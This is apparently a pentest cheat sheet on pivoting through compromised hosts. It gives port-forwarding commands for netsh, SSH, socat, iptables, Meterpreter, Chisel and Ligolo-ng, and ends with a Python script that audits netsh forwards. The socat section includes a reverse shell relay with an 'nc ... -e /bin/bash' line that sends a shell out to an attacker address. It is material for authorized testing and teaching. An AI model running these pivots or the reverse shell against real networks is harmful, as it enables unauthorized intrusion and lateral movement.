Port Forwarding

Forward network traffic from one port to another to access internal services through compromised hosts.
Essential for accessing services on internal networks that are not directly reachable from the attacker machine.

Windows Port Forwarding

Netsh (Native Windows)

Add Port Forward

# Forward local port 8080 to remote host
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.5.10

# Forward specific interface
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=10.10.10.10 connectport=3389 connectaddress=172.16.5.20

List Port Forwards

netsh interface portproxy show all
netsh interface portproxy show v4tov4

Delete Port Forward

# Delete specific forward
netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0

# Delete all forwards
netsh interface portproxy reset

Firewall Rules for Port Forward

# Allow inbound traffic on forwarded port
netsh advfirewall firewall add rule name="Port Forward 8080" protocol=TCP dir=in localport=8080 action=allow

Plink (PuTTY)

Local Port Forward

# Forward local 3389 to remote RDP
plink.exe -L 3389:172.16.5.10:3389 user@10.10.10.10 -pw password

# No remote shell, only the forward (-N); plink stays in the foreground, so run it in its own window
plink.exe -N -L 3389:172.16.5.10:3389 user@10.10.10.10 -pw password

Remote Port Forward

# Forward remote 8080 to local 80
plink.exe -R 8080:127.0.0.1:80 user@10.10.10.10 -pw password

Dynamic Port Forward (SOCKS)

# Create SOCKS proxy
plink.exe -D 1080 user@10.10.10.10 -pw password

SSH (Windows 10+)

Local Port Forward

# Forward local 8080 to remote 80
ssh -L 8080:172.16.5.10:80 user@10.10.10.10

# Multiple forwards
ssh -L 8080:172.16.5.10:80 -L 3389:172.16.5.20:3389 user@10.10.10.10

Remote Port Forward

# Forward remote 4444 to local 4444
ssh -R 4444:127.0.0.1:4444 user@10.10.10.10

Dynamic Port Forward

# Create SOCKS proxy
ssh -D 1080 user@10.10.10.10

Linux Port Forwarding

SSH Port Forwarding

Local Port Forward

# Forward local 8080 to remote service
ssh -L 8080:172.16.5.10:80 user@10.10.10.10

# Bind to all interfaces
ssh -L 0.0.0.0:8080:172.16.5.10:80 user@10.10.10.10

# Multiple forwards
ssh -L 8080:172.16.5.10:80 -L 3389:172.16.5.20:3389 user@10.10.10.10

# Background process
ssh -f -N -L 8080:172.16.5.10:80 user@10.10.10.10

Remote Port Forward

# Forward remote 8080 to local 80
ssh -R 8080:127.0.0.1:80 user@10.10.10.10

# Bind to all interfaces on remote (the remote sshd must have GatewayPorts yes or clientspecified; the default is no)
ssh -R 0.0.0.0:8080:127.0.0.1:80 user@10.10.10.10

# Background process
ssh -f -N -R 8080:127.0.0.1:80 user@10.10.10.10

Dynamic Port Forward (SOCKS)

# Create SOCKS proxy on port 1080
ssh -D 1080 user@10.10.10.10

# Bind to all interfaces
ssh -D 0.0.0.0:1080 user@10.10.10.10

# Background process
ssh -f -N -D 1080 user@10.10.10.10

Socat

Basic Port Forward

# Forward port 8080 to remote service
socat TCP-LISTEN:8080,fork TCP:172.16.5.10:80

# Bind to specific interface
socat TCP-LISTEN:8080,bind=10.10.10.10,fork TCP:172.16.5.10:80

Reverse Shell Relay

# On pivot host - relay to attacker
socat TCP-LISTEN:4444,fork TCP:10.10.14.5:4444

# On attacker
nc -lvnp 4444

# On internal target, connecting to the pivot's internal-facing address (placeholder, substitute the pivot's internal IP)
nc <PIVOT_INTERNAL_IP> 4444 -e /bin/bash

Encrypted Port Forward

# Generate certificate
openssl req -newkey rsa:2048 -nodes -keyout server.key -x509 -days 365 -out server.crt
cat server.key server.crt > server.pem

# Server (encrypted listener)
socat OPENSSL-LISTEN:443,cert=server.pem,verify=0,fork TCP:172.16.5.10:80

# Client
socat TCP-LISTEN:8080,fork OPENSSL:10.10.10.10:443,verify=0

IPTables

Port Forward with IPTables

# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
sysctl -w net.ipv4.ip_forward=1

# Add PREROUTING rule (rewrite inbound 8080 to the internal service)
iptables -t nat -A PREROUTING -p tcp --dport 8080 -j DNAT --to-destination 172.16.5.10:80

# Add POSTROUTING rule (source NAT so replies come back through this host)
iptables -t nat -A POSTROUTING -p tcp -d 172.16.5.10 --dport 80 -j MASQUERADE

# If the FORWARD chain default policy is DROP, the forwarded flow also needs a matching ACCEPT rule in the filter table

# List rules (--line-numbers shows the index used when deleting)
iptables -t nat -L -n -v --line-numbers

# Delete rules by index (1 assumes the rule is first in its chain)
iptables -t nat -D PREROUTING 1
iptables -t nat -D POSTROUTING 1

Rinetd

Configuration

# Install rinetd
apt-get install rinetd

# Edit config
nano /etc/rinetd.conf

# Forwarding rules go in /etc/rinetd.conf, one per line:
# bindaddress bindport connectaddress connectport
0.0.0.0 8080 172.16.5.10 80
0.0.0.0 3389 172.16.5.20 3389

# Restart service
systemctl restart rinetd

# Check status
systemctl status rinetd

Netcat Relay

Simple Port Forward

# Method 1: Named pipe
mkfifo /tmp/pipe
nc -l -p 8080 < /tmp/pipe | nc 172.16.5.10 80 > /tmp/pipe

# Method 2: Two-way relay loop (needs an nc build that supports -c, such as ncat)
while true; do nc -l -p 8080 -c "nc 172.16.5.10 80"; done

Metasploit Port Forwarding

Meterpreter Port Forward

Local Port Forward

# Forward local 3389 to remote RDP
meterpreter> portfwd add -l 3389 -p 3389 -r 172.16.5.10

# Forward local 8080 to remote HTTP
meterpreter> portfwd add -l 8080 -p 80 -r 172.16.5.10

# List forwards
meterpreter> portfwd list

# Delete forward
meterpreter> portfwd delete -l 3389

# Delete all forwards
meterpreter> portfwd flush

Reverse Port Forward

# Forward remote port to local service
meterpreter> portfwd add -R -l 8080 -p 80 -L 127.0.0.1

Chisel Port Forwarding

Local Port Forward

# Server on pivot
./chisel server -p 9001

# Client on attacker - forward local 8080 to remote 80
./chisel client 10.10.10.10:9001 8080:172.16.5.10:80

# Access via localhost
curl http://127.0.0.1:8080

Remote Port Forward

# Server on attacker (reverse mode)
./chisel server --reverse -p 1234

# Client on pivot - forward pivot's 8080 to attacker's 9090
./chisel client 10.10.14.5:1234 R:9090:127.0.0.1:8080

# Access on attacker
curl http://127.0.0.1:9090

Ligolo-ng Port Forwarding

Add Listener

# In ligolo-ng session
listener_add --addr 0.0.0.0:8080 --to 172.16.5.10:80 --tcp

# Forward to attacker machine
listener_add --addr 0.0.0.0:1337 --to 10.10.14.5:8000 --tcp

List and Delete Listeners

# List active listeners
listener_list

# Delete listener by id (ids are shown by listener_list)
listener_del --id 0

Common Scenarios

RDP Access Through Pivot

Windows (Netsh)

# On pivot host
netsh interface portproxy add v4tov4 listenport=3389 listenaddress=0.0.0.0 connectport=3389 connectaddress=172.16.5.10

# On attacker
xfreerdp /v:10.10.10.10:3389 /u:administrator /p:password

Linux (SSH)

# On attacker
ssh -L 3389:172.16.5.10:3389 user@10.10.10.10

# Connect to RDP
xfreerdp /v:127.0.0.1:3389 /u:administrator /p:password

Web Service Access

Forward HTTP

# SSH
ssh -L 8080:172.16.5.10:80 user@10.10.10.10

# Access via browser
http://127.0.0.1:8080

Forward HTTPS

# SSH
ssh -L 8443:172.16.5.10:443 user@10.10.10.10

# Access via browser
https://127.0.0.1:8443

Database Access

MySQL

# Forward MySQL port
ssh -L 3306:172.16.5.10:3306 user@10.10.10.10

# Connect to database
mysql -h 127.0.0.1 -u root -p

MSSQL

# Forward MSSQL port
ssh -L 1433:172.16.5.10:1433 user@10.10.10.10

# Connect with mssqlclient
mssqlclient.py sa:password@127.0.0.1

SMB Access

# Forward SMB port (binding local 445 needs root, and a local smbd or the Windows SMB service will already hold it)
ssh -L 445:172.16.5.10:445 user@10.10.10.10

# Access SMB share
smbclient -L //127.0.0.1 -U administrator

Notes

Netsh Advantages:

  • Native Windows tool
  • No additional software required
  • Persistent across reboots
  • Supports IPv4 and IPv6

Netsh Limitations:

  • Requires administrator privileges
  • Only forwards TCP traffic
  • No encryption
  • Firewall rules may be needed

SSH Port Forwarding:

  • Encrypted by default
  • Supports TCP only
  • Can forward multiple ports
  • Dynamic (SOCKS) and static options
  • Requires SSH access

Socat:

  • Very flexible
  • Supports TCP and UDP
  • Can encrypt traffic
  • Bidirectional relay
  • Single binary

IPTables:

  • Kernel-level forwarding
  • Very fast
  • Requires root access
  • Persistent configuration needed
  • Complex syntax

Tool Selection:

  • Netsh - Windows native, simple setup
  • SSH - Encrypted, cross-platform
  • Socat - Flexible, can encrypt
  • IPTables - Fast, kernel-level
  • Metasploit - Integrated with framework
  • Chisel - Cross-platform, firewall-friendly
  • Ligolo-ng - Fast, feature-rich

Common Pitfalls:

  • Forgetting to allow firewall rules
  • Binding to wrong interface (127.0.0.1 vs 0.0.0.0)
  • Port conflicts
  • Not enabling IP forwarding (Linux)
  • Incorrect port numbers
  • Missing authentication

Performance:

  • IPTables is fastest (kernel-level)
  • SSH adds encryption overhead
  • Socat is efficient
  • Netsh is native and fast
  • Metasploit adds framework overhead

Persistence:

  • Netsh forwards persist across reboots
  • SSH forwards require reconnection
  • IPTables rules need to be saved
  • Rinetd runs as service
  • Socat needs process management

Security Considerations:

  • Port forwards bypass network firewall and segmentation rules by relaying through a host allowed to reach both sides
  • Can expose internal services
  • SSH provides encryption
  • Netsh has no encryption
  • Monitor for unauthorized forwards
  • Clean up after engagement
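As an added defender-side example (not part of this page or any of the tools it lists), the script below parses the output of `netsh interface portproxy show all` from the Netsh section and reports every forward that is not on an approved list, calling out wildcard listeners that expose the forwarded service on all interfaces. The sample output is constructed; the approved list and the function names are assumptions. The same entries are what netsh persists under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy, which is why they survive reboots.

```python
import re
from dataclasses import dataclass

# Constructed sample of `netsh interface portproxy show all` output (not captured
# from a real host). netsh prints a section per address-family pair, a column
# header, a dashed rule, then one row per forward.
SAMPLE_NETSH_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
0.0.0.0         8080        172.16.5.10     80
10.10.10.10     3389        172.16.5.20     3389
"""

@dataclass(frozen=True)
class PortProxyEntry:
    listen_addr: str
    listen_port: int
    connect_addr: str
    connect_port: int

# A forward row is: address, port, address, port. Titles, headers and the
# dashed rule never have a number in the second column, so they never match.
ROW_RE = re.compile(r"^(\S+)\s+(\d+)\s+(\S+)\s+(\d+)$")

# Listen addresses that expose the forward on every interface of the host.
WILDCARD_LISTENERS = {"0.0.0.0", "::"}

def parse_portproxy(output: str) -> list[PortProxyEntry]:
    """Parse every v4/v6 forward row of `netsh interface portproxy show all`."""
    entries = []
    for line in output.splitlines():
        m = ROW_RE.match(line.strip())
        if m is None:
            continue
        entries.append(PortProxyEntry(m.group(1), int(m.group(2)),
                                      m.group(3), int(m.group(4))))
    return entries

def audit_portproxy(output: str, approved: set[tuple[str, int, str, int]]) -> list[str]:
    """Return one finding per forward that is not in the approved set
    (listen_addr, listen_port, connect_addr, connect_port)."""
    findings = []
    for e in parse_portproxy(output):
        if (e.listen_addr, e.listen_port, e.connect_addr, e.connect_port) in approved:
            continue
        scope = "all interfaces" if e.listen_addr in WILDCARD_LISTENERS else e.listen_addr
        findings.append(f"unapproved portproxy: {scope}:{e.listen_port} "
                        f"-> {e.connect_addr}:{e.connect_port}")
    return findings
```

Run it against `netsh interface portproxy show all` output collected from each host (or the registry key above) and alert on any non-empty result; an empty approved set flags every forward.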

Troubleshooting:

  • Verify port is listening: netstat -an | grep PORT
  • Check firewall rules
  • Test connectivity with telnet/nc
  • Verify IP forwarding enabled (Linux)
  • Check for port conflicts
  • Use verbose mode for debugging